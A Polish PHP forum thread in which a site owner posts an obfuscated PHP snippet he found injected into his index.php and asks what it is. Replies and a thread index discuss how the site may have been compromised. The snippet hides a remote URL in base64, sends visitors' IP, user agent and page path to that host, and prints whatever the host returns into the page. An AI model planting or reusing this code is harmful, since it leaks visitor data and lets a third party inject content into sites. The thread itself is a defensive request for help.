Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Podejrzenie włamania na serwer, Proszę o szybką pomoc
Barcelona
post
Post #1





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----

Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

[PHP] pobierz, plaintext 
  1. <?php    
  2.  
  3.     // This code use for global bot statistic
  4.  
  5.     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
  6.  
  7.     $stCurlHandle = NULL;
  8.  
  9.     $stCurlLink = "";
  10.  
  11.     if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
  12.  
  13.     {
  14.  
  15.         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
  16.  
  17.         $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
  18.  
  19.             $stCurlHandle = curl_init( $stCurlLink ); 
  20.  
  21.     }
  22.  
  23.     } 
  24.  
  25. if ( $stCurlHandle !== NULL )
  26.  
  27. {
  28.  
  29.     curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  30.  
  31.     $sResult = @curl_exec($stCurlHandle); 
  32.  
  33.     if ($sResult[0]=="O") 
  34.  
  35.      {$sResult[0]=" ";
  36.  
  37.       echo $sResult; // Statistic code end
  38.  
  39.       }
  40.  
  41.     curl_close($stCurlHandle); 
  42.  
  43. }
  44.  
  45. ?>
[PHP] pobierz, plaintext


Co to jest? Proszę o pomoc.
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
konrados
post
Post #2





Grupa: Zarejestrowani
Postów: 623
Pomógł: 79
Dołączył: 16.01.2008

Ostrzeżenie: (0%)
-----

Cytat
Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.


Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.
Go to the top of the page
+Quote Post

Posty w temacie
- Barcelona   Podejrzenie włamania na serwer   27.09.2011, 23:36:55
- - tabbi   Ktoś zbiera dane na temat twojej strony i wysyła ...   27.09.2011, 23:55:21
- - Barcelona   Tutaj zostaje wysłane, ale jakim cudem ten kod zna...   28.09.2011, 00:03:40
- - tabbi   Odpowiedzi na to pytanie może być wiele, zaczynaj...   28.09.2011, 00:57:51
- - Barcelona   Nikomu nie udostępniałem hasła, znam go tylko ja i...   28.09.2011, 01:43:53
- - Damonsson   Total Commander? ;>   28.09.2011, 01:46:10
- - Barcelona   Już dawno nie, WinSCP   28.09.2011, 02:02:17
- - konrados   CytatTotal Commander? A właściwie to o co chodzi ...   2.10.2011, 12:54:04
- - pienso   Jak będziesz wiedział to daj znać gdzie była luka ...   2.10.2011, 13:55:55
- - konrados   CytatJak będziesz wiedział to daj znać gdzie była ...   2.10.2011, 15:10:37
- - drozdii07   Jeśli zapamiętujesz hasło w TC, to później wirusy ...   2.10.2011, 15:14:52
- - konrados   CytatJeśli zapamiętujesz hasło w TC, to później wi...   2.10.2011, 15:19:40
|- - Fifi209   Cytat(konrados @ 2.10.2011, 16:19:40 ...   2.10.2011, 15:53:44
- - Korab   To może przeskanuj sobie komputer dwoma programami...   2.10.2011, 16:03:31
- - konrados   CytatPo pierwsze, nie musisz sobie ściągać wirusa ...   2.10.2011, 16:42:25
|- - 92nasti   Cytat(konrados @ 2.10.2011, 17:42:25 ...   2.10.2011, 17:41:38
- - konrados   CytatBłyszczysz wiedzą, w sumie to za chwile dojdz...   2.10.2011, 17:49:26
- - Barcelona   Uuuu troche mnie nie było i widzę że wątek nabrał ...   2.10.2011, 21:50:21
|- - mcsgroup   Cytat(Barcelona @ 2.10.2011, 22:50:21...   4.10.2011, 12:22:09
- - by_ikar   KodWracając do tematów TC i wirusów, to ja jestem ...   3.10.2011, 09:54:32
- - Barcelona   CytatWytłumacz mi jak antywirus znajdzie wirusa, n...   4.10.2011, 11:39:02
- - Barcelona   No i dziękuje za potwierdzenie mojej teorii Jest ...   6.10.2011, 14:44:10
- - gekoncaros   Witam nie jestes sam ja tez na serwerze linuxpl.co...   23.11.2011, 12:24:14
- - pioklo   Cytat(gekoncaros @ 23.11.2011, 13:24...   25.11.2011, 22:58:10

« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 2.10.2025 - 19:44
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn